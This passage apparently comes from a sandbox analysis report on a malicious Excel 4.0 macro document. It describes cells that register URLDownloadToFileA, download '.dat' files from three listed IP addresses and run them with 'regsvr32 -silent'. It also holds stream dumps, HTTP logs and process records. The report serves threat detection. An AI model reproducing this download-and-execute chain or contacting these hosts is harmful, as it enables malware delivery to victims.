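The walk stops at H35 and yields eight executed cells: REGISTER("uRlMon","URLDownloadToFileA","JJCCBB","Byukilos",,1,9), three Byukilos(...) downloads, three EXEC("regsvr32 -silent ..\Celod.wac...") calls and HALT(). The type string JJCCBB is the REGISTER signature for URLDownloadToFileA: a J (32-bit integer) return value followed by J, C, C, B, B arguments (integer, two null-terminated strings, two 8-byte numbers), matching the (0, url, path, 0, 0) call. Because K17 holds =NOW(), the requested file name changes on every run, so the exact URL is not a stable indicator; the host addresses, the ".dat" suffix and the regsvr32 -silent command line are.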
    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4742
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4742
    Entropy:4.52712950519
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2762
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
    File Type:data
    Stream Size:2762
    Entropy:3.46797277739
    Base64 Encoded:False
    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 01 00 02 00 05 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 158
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
    File Type:data
    Stream Size:158
    Entropy:1.51849967362
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 361
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
    File Type:data
    Stream Size:361
    Entropy:2.18989522343
    Base64 Encoded:False
    Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 356
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
    File Type:data
    Stream Size:356
    Entropy:1.93515224578
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 170
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
    File Type:data
    Stream Size:170
    Entropy:1.63817063364
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 156
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
    File Type:data
    Stream Size:156
    Entropy:1.63365900945
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1097
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/dir
    File Type:data
    Stream Size:1097
    Entropy:6.70583195188
    Base64 Encoded:True
    Data ASCII:. E . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . 7 5 . U c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
    Data Raw:01 45 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 37 35 a0 55 63 01 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

    Network Behavior

    Network Port Distribution

    TCP Packets

    Timestamp                            Source Port  Dest Port  Source IP       Dest IP
    Oct 6, 2021 17:49:02.635343075 CEST  49167        80         192.168.2.22    190.14.37.107
    Oct 6, 2021 17:49:02.820914030 CEST  80           49167      190.14.37.107   192.168.2.22
    Oct 6, 2021 17:49:02.821108103 CEST  49167        80         192.168.2.22    190.14.37.107
    Oct 6, 2021 17:49:02.822520018 CEST  49167        80         192.168.2.22    190.14.37.107
    Oct 6, 2021 17:49:03.008789062 CEST  80           49167      190.14.37.107   192.168.2.22
    Oct 6, 2021 17:49:03.632167101 CEST  80           49167      190.14.37.107   192.168.2.22
    Oct 6, 2021 17:49:03.632419109 CEST  49167        80         192.168.2.22    190.14.37.107
    Oct 6, 2021 17:49:03.661942959 CEST  49168        80         192.168.2.22    94.140.114.111
    Oct 6, 2021 17:49:03.707320929 CEST  80           49168      94.140.114.111  192.168.2.22
    Oct 6, 2021 17:49:03.708038092 CEST  49168        80         192.168.2.22    94.140.114.111
    Oct 6, 2021 17:49:03.708863020 CEST  49168        80         192.168.2.22    94.140.114.111
    Oct 6, 2021 17:49:03.754745007 CEST  80           49168      94.140.114.111  192.168.2.22
    Oct 6, 2021 17:49:03.827230930 CEST  80           49168      94.140.114.111  192.168.2.22
    Oct 6, 2021 17:49:03.827404022 CEST  49168        80         192.168.2.22    94.140.114.111
    Oct 6, 2021 17:49:03.848263025 CEST  49169        80         192.168.2.22    188.165.62.50
    Oct 6, 2021 17:49:03.873059988 CEST  80           49169      188.165.62.50   192.168.2.22
    Oct 6, 2021 17:49:03.873236895 CEST  49169        80         192.168.2.22    188.165.62.50
    Oct 6, 2021 17:49:03.873933077 CEST  49169        80         192.168.2.22    188.165.62.50
    Oct 6, 2021 17:49:03.898515940 CEST  80           49169      188.165.62.50   192.168.2.22
    Oct 6, 2021 17:49:04.062262058 CEST  80           49169      188.165.62.50   192.168.2.22
    Oct 6, 2021 17:49:04.062339067 CEST  49169        80         192.168.2.22    188.165.62.50
    Oct 6, 2021 17:50:08.638166904 CEST  80           49167      190.14.37.107   192.168.2.22
    Oct 6, 2021 17:50:08.638524055 CEST  49167        80         192.168.2.22    190.14.37.107
    Oct 6, 2021 17:50:08.828970909 CEST  80           49168      94.140.114.111  192.168.2.22
    Oct 6, 2021 17:50:08.829133987 CEST  49168        80         192.168.2.22    94.140.114.111
    Oct 6, 2021 17:50:09.062952042 CEST  80           49169      188.165.62.50   192.168.2.22
    Oct 6, 2021 17:50:09.063263893 CEST  49169        80         192.168.2.22    188.165.62.50
    Oct 6, 2021 17:51:02.526983976 CEST  49169        80         192.168.2.22    188.165.62.50
    Oct 6, 2021 17:51:02.527353048 CEST  49168        80         192.168.2.22    94.140.114.111
    Oct 6, 2021 17:51:02.527673960 CEST  49167        80         192.168.2.22    190.14.37.107
    Oct 6, 2021 17:51:02.551896095 CEST  80           49169      188.165.62.50   192.168.2.22
    Oct 6, 2021 17:51:02.575489044 CEST  80           49168      94.140.114.111  192.168.2.22
    Oct 6, 2021 17:51:02.713582993 CEST  80           49167      190.14.37.107   192.168.2.22

    HTTP Request Dependency Graph

    • 190.14.37.107
    • 94.140.114.111
    • 188.165.62.50

    HTTP Packets

    Session ID  Source IP       Source Port  Destination IP  Destination Port  Process
    0           192.168.2.22    49167        190.14.37.107   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Timestamp                            kBytes transferred  Direction  Data
    Oct 6, 2021 17:49:02.822520018 CEST  0                   OUT        GET /44475.7418916667.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 190.14.37.107
    Connection: Keep-Alive
    Oct 6, 2021 17:49:03.632167101 CEST  1                   IN         HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Oct 2021 15:49:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.16
    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


    Session ID  Source IP       Source Port  Destination IP  Destination Port  Process
    1           192.168.2.22    49168        94.140.114.111  80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Timestamp                            kBytes transferred  Direction  Data
    Oct 6, 2021 17:49:03.708863020 CEST  1                   OUT        GET /44475.7418916667.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 94.140.114.111
    Connection: Keep-Alive
    Oct 6, 2021 17:49:03.827230930 CEST  2                   IN         HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Oct 2021 15:49:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.16
    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


    Session ID  Source IP       Source Port  Destination IP  Destination Port  Process
    2           192.168.2.22    49169        188.165.62.50   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Timestamp                            kBytes transferred  Direction  Data
    Oct 6, 2021 17:49:03.873933077 CEST  2                   OUT        GET /44475.7418916667.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 188.165.62.50
    Connection: Keep-Alive
    Oct 6, 2021 17:49:04.062262058 CEST  3                   IN         HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 06 Oct 2021 15:49:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.16
    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


    Code Manipulations

    Statistics

    CPU Usage

    Memory Usage

    High Level Behavior Distribution

    Behavior

    System Behavior

    General

    Start time:17:48:16
    Start date:06/10/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fcd0000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    General

    Start time:17:48:21
    Start date:06/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac
    Imagebase:0xffb40000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:17:48:21
    Start date:06/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac1
    Imagebase:0xffb40000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:17:48:21
    Start date:06/10/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -silent ..\Celod.wac2
    Imagebase:0xffb40000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis
